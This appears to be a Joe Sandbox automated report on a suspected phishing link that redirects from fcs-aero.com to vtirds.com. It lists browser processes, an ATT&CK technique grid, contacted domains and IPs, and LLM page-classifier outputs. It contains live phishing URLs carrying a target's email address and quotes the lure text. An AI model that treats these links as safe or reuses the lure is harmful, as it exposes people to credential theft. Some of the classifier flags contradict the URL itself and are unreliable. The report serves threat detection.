    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=1928,i,14128857340577309046,9957980302040716392,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://fcs-aero.com/ilsmart/marketplace/inventory/#ksunya.chan@yogiproducts.com"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=1928,i,14128857340577309046,9957980302040716392,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=1976,i,16931578172038892792,8681345284959200474,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=1976,i,16931578172038892792,8681345284959200474,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information1
    Scripting
    Valid AccountsWindows Management Instrumentation1
    Scripting
    1
    Process Injection
    1
    Masquerading
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    Registry Run Keys / Startup Folder
    1
    Registry Run Keys / Startup Folder
    1
    Process Injection
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
    Extra Window Memory Injection
    1
    Deobfuscate/Decode Files or Information
    Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Extra Window Memory Injection
    NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    NameIPActiveMaliciousAntivirus DetectionReputation
    jsdelivr.map.fastly.net
    151.101.1.229
    truefalse
      unknown
      bravotechet.ru
      188.114.97.3
      truefalse
        unknown
        vtirds.com
        188.114.96.3
        truefalse
          unknown
          plus.l.google.com
          142.250.181.238
          truefalse
            unknown
            play.google.com
            142.250.185.206
            truefalse
              unknown
              www3.l.google.com
              216.58.206.46
              truefalse
                unknown
                cdnjs.cloudflare.com
                104.17.24.14
                truefalse
                  unknown
                  challenges.cloudflare.com
                  104.18.95.41
                  truefalse
                    unknown
                    www.google.com
                    142.250.186.164
                    truefalse
                      unknown
                      i.gifer.com
                      104.26.12.192
                      truefalse
                        unknown
                        fcs-aero.com
                        188.114.96.3
                        truefalse
                          unknown
                          cdn.jsdelivr.net
                          unknown
                          unknownfalse
                            unknown
                            ogs.google.com
                            unknown
                            unknownfalse
                              unknown
                              apis.google.com
                              unknown
                              unknownfalse
                                unknown
                                NameMaliciousAntivirus DetectionReputation
                                https://vtirds.com/1snyprl1jkeknjkxdm-x6amst48yp-cn11nl9oskvc7y/#xkbillgfalse
                                  unknown
                                  chrome://newtab/false
                                    unknown
                                    https://vtirds.com/1snyprl1jkeknjkxdm-x6amst48yp-cn11nl9oskvc7y/#xksunya.chan@yogiproducts.comfalse
                                      unknown
                                      https://fcs-aero.com/ilsmart/marketplace/inventory/#ksunya.chan@yogiproducts.comfalse
                                        unknown
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                                        IPDomainCountryFlagASNASN NameMalicious
                                        142.250.186.46
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        142.250.185.99
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        142.250.185.206
                                        play.google.comUnited States
                                        15169GOOGLEUSfalse
                                        172.217.16.138
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        104.18.94.41
                                        unknownUnited States
                                        13335CLOUDFLARENETUSfalse
                                        74.125.206.84
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        142.250.181.238
                                        plus.l.google.comUnited States
                                        15169GOOGLEUSfalse
                                        104.26.12.192
                                        i.gifer.comUnited States
                                        13335CLOUDFLARENETUSfalse
                                        2.23.209.185
                                        unknownEuropean Union
                                        1273CWVodafoneGroupPLCEUfalse
                                        142.250.184.227
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        216.58.212.174
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        142.250.184.195
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        104.17.24.14
                                        cdnjs.cloudflare.comUnited States
                                        13335CLOUDFLARENETUSfalse
                                        151.101.1.229
                                        jsdelivr.map.fastly.netUnited States
                                        54113FASTLYUSfalse
                                        142.250.185.67
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        1.1.1.1
                                        unknownAustralia
                                        13335CLOUDFLARENETUSfalse
                                        74.125.133.84
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        142.250.186.163
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        104.26.13.192
                                        unknownUnited States
                                        13335CLOUDFLARENETUSfalse
                                        172.217.18.3
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        104.18.95.41
                                        challenges.cloudflare.comUnited States
                                        13335CLOUDFLARENETUSfalse
                                        216.58.206.46
                                        www3.l.google.comUnited States
                                        15169GOOGLEUSfalse
                                        239.255.255.250
                                        unknownReserved
                                        unknownunknownfalse
                                        188.114.97.3
                                        bravotechet.ruEuropean Union
                                        13335CLOUDFLARENETUSfalse
                                        142.250.185.131
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        188.114.96.3
                                        vtirds.comEuropean Union
                                        13335CLOUDFLARENETUSfalse
                                        142.250.186.164
                                        www.google.comUnited States
                                        15169GOOGLEUSfalse
                                        142.250.186.100
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        2.23.209.179
                                        unknownEuropean Union
                                        1273CWVodafoneGroupPLCEUfalse
                                        IP
                                        192.168.2.18
                                        192.168.2.22
                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1546308
                                        Start date and time:2024-10-31 18:56:35 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                        Sample URL:https://fcs-aero.com/ilsmart/marketplace/inventory/#ksunya.chan@yogiproducts.com
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:18
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • EGA enabled
                                        Analysis Mode:stream
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal48.phis.win@41/0@48/291
                                        • Exclude process from analysis (whitelisted): SIHClient.exe
                                        • Excluded IPs from analysis (whitelisted): 142.250.186.163, 216.58.212.174, 74.125.206.84
                                        • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, slscr.update.microsoft.com, clientservices.googleapis.com, clients.l.google.com
                                        • Not all processes where analyzed, report is missing behavior information
                                        • VT rate limit hit for: https://fcs-aero.com/ilsmart/marketplace/inventory/#ksunya.chan@yogiproducts.com
                                        InputOutput
                                        URL: Model: claude-3-5-sonnet-latest
                                        {
                                            "typosquatting": false,
                                            "unusual_query_string": false,
                                            "suspicious_tld": false,
                                            "ip_in_url": false,
                                            "long_subdomain": false,
                                            "malicious_keywords": false,
                                            "encoded_characters": false,
                                            "redirection": false,
                                            "contains_email_address": false,
                                            "known_domain": false,
                                            "brand_spoofing_attempt": false,
                                            "third_party_hosting": false
                                        }
                                        URL: URL: https://fcs-aero.com
                                        URL: https://fcs-aero.com/ilsmart/marketplace/inventory/#ksunya.chan@yogiproducts.com Model: claude-3-haiku-20240307
                                        ```json
                                        {
                                          "contains_trigger_text": true,
                                          "trigger_text": "Please hold while our server verifies your secure document",
                                          "prominent_button_name": "unknown",
                                          "text_input_field_labels": "unknown",
                                          "pdf_icon_visible": false,
                                          "has_visible_captcha": false,
                                          "has_urgent_text": true,
                                          "has_visible_qrcode": false
                                        }
                                        URL: https://vtirds.com/1snyprl1jkeknjkxdm-x6amst48yp-cn11nl9oskvc7y/#xksunya.chan@yogiproducts.com Model: claude-3-haiku-20240307
                                        ```json
                                        {
                                          "contains_trigger_text": true,
                                          "trigger_text": "Verifying...",
                                          "prominent_button_name": "unknown",
                                          "text_input_field_labels": "unknown",
                                          "pdf_icon_visible": false,
                                          "has_visible_captcha": false,
                                          "has_urgent_text": false,
                                          "has_visible_qrcode": false
                                        }
                                        URL: Model: claude-3-5-sonnet-latest
                                        {
                                            "typosquatting": false,
                                            "unusual_query_string": false,
                                            "suspicious_tld": false,
                                            "ip_in_url": false,
                                            "long_subdomain": false,
                                            "malicious_keywords": false,
                                            "encoded_characters": false,
                                            "redirection": false,
                                            "contains_email_address": false,
                                            "known_domain": false,
                                            "brand_spoofing_attempt": false,
                                            "third_party_hosting": false
                                        }
                                        URL: URL: https://vtirds.com
                                        URL: https://fcs-aero.com/ilsmart/marketplace/inventory/#ksunya.chan@yogiproducts.com Model: claude-3-haiku-20240307
                                        ```json
                                        {
                                          "brands": []
                                        }
                                        ```
                                        
                                        The provided image does not contain any visible brand logos or names. The page appears to be a generic loading or redirecting page without any branding elements.
                                        URL: https://vtirds.com/1snyprl1jkeknjkxdm-x6amst48yp-cn11nl9oskvc7y/#xksunya.chan@yogiproducts.com Model: claude-3-haiku-20240307
                                        ```json
                                        {
                                          "brands": [
                                            "Cloudflare"
                                          ]
                                        }
                                        URL: https://vtirds.com/1snyprl1jkeknjkxdm-x6amst48yp-cn11nl9oskvc7y/#xksunya.chan@yogiproducts.com Model: claude-3-haiku-20240307
                                        ```json
                                        {
                                          "contains_trigger_text": true,
                                          "trigger_text": "Success!",
                                          "prominent_button_name": "unknown",
                                          "text_input_field_labels": "unknown",
                                          "pdf_icon_visible": false,
                                          "has_visible_captcha": false,
                                          "has_urgent_text": false,
                                          "has_visible_qrcode": false
                                        }
                                        URL: https://vtirds.com/1snyprl1jkeknjkxdm-x6amst48yp-cn11nl9oskvc7y/#xksunya.chan@yogiproducts.com Model: claude-3-haiku-20240307
                                        ```json
                                        {
                                          "brands": [
                                            "Cloudflare"
                                          ]
                                        }
                                        URL: Model: claude-3-5-sonnet-latest
                                        {
                                            "typosquatting": false,
                                            "unusual_query_string": false,
                                            "suspicious_tld": false,
                                            "ip_in_url": false,
                                            "long_subdomain": false,
                                            "malicious_keywords": false,
                                            "encoded_characters": false,
                                            "redirection": false,
                                            "contains_email_address": false,
                                            "known_domain": true,
                                            "brand_spoofing_attempt": false,
                                            "third_party_hosting": false
                                        }
                                        URL: URL: chrome://newtab
                                        No created / dropped files found
                                        No static file info